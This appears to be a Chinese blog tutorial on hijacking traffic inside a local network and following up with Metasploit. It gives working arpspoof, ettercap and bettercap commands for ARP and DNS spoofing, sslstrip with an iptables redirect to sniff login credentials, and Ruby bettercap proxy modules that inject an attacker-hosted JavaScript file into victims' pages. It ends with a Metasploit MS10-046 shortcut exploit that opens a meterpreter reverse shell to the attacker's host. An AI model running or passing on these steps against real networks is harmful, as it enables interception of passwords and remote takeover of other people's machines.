内网劫持结合metasploit

内网劫持命令:
bettercap -X -I eth0 -G 192.168.211.1 -T 192.168.211.137 --dns '/root/桌面/dns.conf'
ettercap -Tq -i eth0 -P dns_spoof -T 192.168.211.137
ipconfig/flushdns   清除缓存
echo 1 > /proc/sys/net/ipv4/ip_forward    启用内核包转发,修改/proc/sys/net/ipv4/ip_forward文件

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000   端口转发,10000为sslstrip的监听端口


Ettercap+arpspoof+sslstrip=Bettercap
arpspoof -i eth0 -t 192.168.211.137 192.168.211.1   shell1,ARP欺骗

sslstrip -l 10000   使用sslstrip监听10000端口

//sslstrip -a -k -f   开启sslstrip

ettercap -T -q -i eth0   嗅探得到登陆Gmail邮箱的用户名和密码
第一个//中加上目标主机,第二个//中加上网关路由ip

Bettercap
凭证嗅探器

内置的嗅探器目前能够分析打印如下网络内容:
1.被访问的URLs
2.被访问过的HTTPS主机
3.HTTP发布过的数据
4.HTTP Basic认证以及摘要认证
5.FTP凭证
6.IRC凭证
7.POP, IMAP以及SMTP凭证
8.NTLMv1/v2 ( HTTP, SMB, LDAP等) 凭证


bettercap arp spoofing功能以及它的多个主机发现代理能够将令人烦躁的步骤简化。你只需要启动工具,然后等待它完成工作。
sudo bettercap -X  嗅探器默认的模式,所有解析器启用: 


sudo bettercap -X -P "FTP,HTTPAUTH,MAIL,NTLMSS"   启用嗅探器,启用指定解析器


sudo bettercap -X -L    启用嗅探器+所有解析器,此外并解析本地通信


一个模块化的透明代理,可以从使用–proxy参数开始。除非你记录HTTP请求,在默认情况下他不会做任何事。当然你也可以指定一个–proxy-module参数,这样你就可以加载自己的模块,随意操作HTTP流量


sudo bettercap --proxy    默认端口(8080)启用代理,不带任何模块


sudo bettercap --proxy --proxy-port=8081    使用自定义端口启用代理


sudo bettercap --proxy --proxy-module=hack_title.rb     启用代理并加载hack_title.rb模块


sudo bettercap -S NONE --proxy   禁用spoofer并启用代理(独立代理模式)




class HackTitle < Proxy::Module
  def on_request( request, response )    # is it a html page?
    if response.content_type == 'text/html'
      Logger.info "Hacking http://#{request.host}#{request.url} title tag"
      # make sure to use sub! or gsub! to update the instance
      response.body.sub!( '<title>', '<title> !!! HACKED !!! ' )    end
  endend


bettercap内置一个HTTP服务器,允许你从自己的机器上定制内容,而不需要安装配置诸如Apache, nginx 或者lighttpd等软件。


你需要使用proxy module模块:


class InjectJS < Proxy::Module
  def on_request( request, response )    
  # is it a html page?
    if response.content_type == 'text/html'
      Logger.info "Injecting javascript file into http://#{request.host}#{request.url} page"
      # get the local interface address and HTTPD port
      localaddr = Context.get.iface[:ip_saddr]
      localport = Context.get.options[:httpd_port]      
      # inject the js
      response.body.sub!( '</title>', "</title><script src='http://#{localaddr}:#{localport}/file.js'
       type='text/javascript'></script>" )
          end
  end
end
接着使用它就能将JS文件注入到HTTP响应中,使用bettercap来管理这个文件




MS10_046
Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。


Windows没有正确地处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。这些代码可能位于USB驱动、本地 或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在位置就足以触发这个漏洞。默认下Windows启动了自动加载和自动播放功能,因此 在连接可移动设备(如USB闪存)后Windows会自动打开资源管理器。其他显示文件图标的应用也可用作这个漏洞的攻击载体。受影响的Windows系统如下:


受影响的Windows系统类型


Microsoft Windows XP SP3


Microsoft Windows XP SP2


Microsoft Windows Vista SP2


Microsoft Windows Vista SP1


Microsoft Windows Server 2008


Microsoft Windows Server 2008 SP2


Microsoft Windows Server 2008 R2


Microsoft Windows Server 2003 SP2


Microsoft Windows 7


sudo bettercap --httpd --http-path=/path/to/your/js/file/ --proxy --proxy-module=inject.rb


use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 


set payload windows/meterpreter/reverse_tcp


set LHOST 192.168.211.179


set SRVHOST 192.168.211.179


exploit





























































































































































  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值